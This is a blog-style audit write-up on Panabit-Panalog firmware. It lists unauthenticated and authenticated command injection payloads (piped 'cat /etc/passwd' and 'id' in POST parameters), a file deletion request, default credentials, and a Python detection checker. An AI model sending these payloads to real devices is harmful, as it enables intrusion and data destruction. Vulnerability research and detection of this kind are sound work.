Full Guide on Auditing Panabit-Panalog Log System Firmware

We delve into the fascinating world of firmware auditing, focusing on the Panabit-Panalog Log System.

As technology continues to advance at a rapid pace, ensuring the security and functionality of our systems is of paramount importance.

Firmware auditing plays a crucial role in this process, helping us identify potential vulnerabilities and implement necessary fixes.

In this post, we’ll guide you through a step-by-step process of auditing the Panabit-Panalog Log System firmware, highlighting the key areas to focus on and providing practical tips along the way.

Getting Started

This guide is aimed at auditing the Panabit-Panalog Log System firmware. The versions affected are <= MARS r10p1Free, with an impact range of 1.2w-1.4w.

You can check your version by accessing the /cretime.txt file. The default username and password are admin|panabit.

You can download the firmware source code from Panabit. After downloading, you’ll find the web directory at \usr\logd\www.

Let’s get started with the audit.

Front-end Arbitrary Command Execution

To focus on pre-authentication (front-end) vulnerabilities during the audit, first set aside every file that enforces a session check, so that only the unauthenticated entry points remain.

Working on a copy of the extracted web directory, the following command deletes every file that contains the authentication call:

rm -rf $(grep -ril 'chksession()' ./)

Command Execution Point 1

Here, a command execution point is identified. The ‘username’ parameter is passed into ‘exec’, so its value ends up inside a shell command. There is no command echo: the output is not returned in the response, so the result has to be observed out of band.

Use the following parameters:

POST /account/sy_query.php

username=|cat /etc/passwd >1.txt

Command Execution Point 2

Here, another front-end command execution point is located. Three parameters are passed (through either GET or POST): token, id and host. The command is only built and executed when the following check passes, i.e. when token is non-empty and id is a non-empty, non-negative value:

// Execution continues only if none of these conditions holds
if (empty($token) || $id < 0 || $id == "") {
	outputres("no", "ERROR: INVALID_PARAM");
	exit;
}

Use the following payload:

POST /content-apply/libres_syn_delete.php

token=1&id=2&host=|cat /etc/passwd >222.txt

Back-end Arbitrary Command Execution

Execution Point 1

/ajax_ping.php

Here, the ‘ipaddr’ parameter is read from the POST body and passed into an ‘exec’ call.

Use this payload:

POST /ajax_ping.php HTTP/1.1

ipaddr=|id >2.txt

Execution Point 2

/fetchfile.php

Here, the ‘filename’, ‘nodeip’ and ‘type’ parameters are controllable through POST and reach an ‘exec’ call.

Use this payload:

POST /fetchfile.php HTTP/1.1

type=downloadfile&filename=|id >5.txt

Back-end Arbitrary File Deletion

Here, a file deletion operation was located in /deletefile.php. The ‘filename’ parameter is passed straight to ‘unlink’, with no restriction on which file may be removed.

Use this payload:

POST /deletefile.php HTTP/1.1

filename=5.txt
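As an added defensive example (not code from the original post or from Panabit), the following Python request checker covers both the command execution points and the file deletion point described above: it flags shell metacharacters in the parameters named for each endpoint, and path separators or traversal in the filename handed to deletefile.php. The endpoint-to-parameter map is taken from the page; the sample requests are constructed, and the checker is meant to run in front of the web root (a reverse proxy or WAF hook) as a virtual patch until the firmware is updated.

```python
import re
from urllib.parse import parse_qs

# Endpoints and the parameters the audit above found reaching exec() or unlink().
# The mapping is taken from the page; the checker itself is an added example.
WATCHED = {
    "/account/sy_query.php": {"username"},
    "/content-apply/libres_syn_delete.php": {"token", "id", "host"},
    "/ajax_ping.php": {"ipaddr"},
    "/fetchfile.php": {"filename", "nodeip", "type"},
    "/deletefile.php": {"filename"},
}

# Characters that break out of a shell command built by string concatenation.
SHELL_META = re.compile(r"[|;&`$><\n\r]")
# Anything that turns a bare file name into a path (traversal or absolute path).
PATH_ESCAPE = re.compile(r"\.\.|[/\\]")


def find_injection(path, body):
    """Return (param, value) pairs that look like injection attempts against one
    of the watched endpoints; [] for unwatched paths or clean input."""
    params = WATCHED.get(path)
    if not params:
        return []
    hits = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if name not in params:
            continue
        for value in values:
            if SHELL_META.search(value) or (name == "filename" and PATH_ESCAPE.search(value)):
                hits.append((name, value))
    return hits


# Constructed sample requests (not captured traffic): benign use, the payload
# shapes shown above, and an unwatched endpoint that must be ignored.
SAMPLE_REQUESTS = [
    ("/ajax_ping.php", "ipaddr=192.0.2.10"),
    ("/ajax_ping.php", "ipaddr=|id >2.txt"),
    ("/fetchfile.php", "type=downloadfile&filename=|id >5.txt"),
    ("/deletefile.php", "filename=5.txt"),
    ("/deletefile.php", "filename=../../etc/rc.conf"),
    ("/index.php", "q=a|b"),
]

def scan(requests):
    """Run the check over (path, body) pairs and return (path, (param, value)) alerts."""
    return [(path, hit) for path, body in requests for hit in find_injection(path, body)]
```

Calling scan(SAMPLE_REQUESTS) yields three alerts: the two command injection bodies and the traversal attempt against deletefile.php; the benign ping, the plain file name and the unwatched endpoint pass through.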

Conclusion

We’ve reached the end of our comprehensive guide on auditing the Panabit-Panalog Log System firmware.

Always ensure you’re using the latest version of your software to avoid potential vulnerabilities.

We hope that the detailed walkthrough, from identifying arbitrary command execution points to spotting file deletion operations, has been insightful.

Remember, firmware auditing is a critical aspect of maintaining system integrity and security, and it’s a skill worth mastering.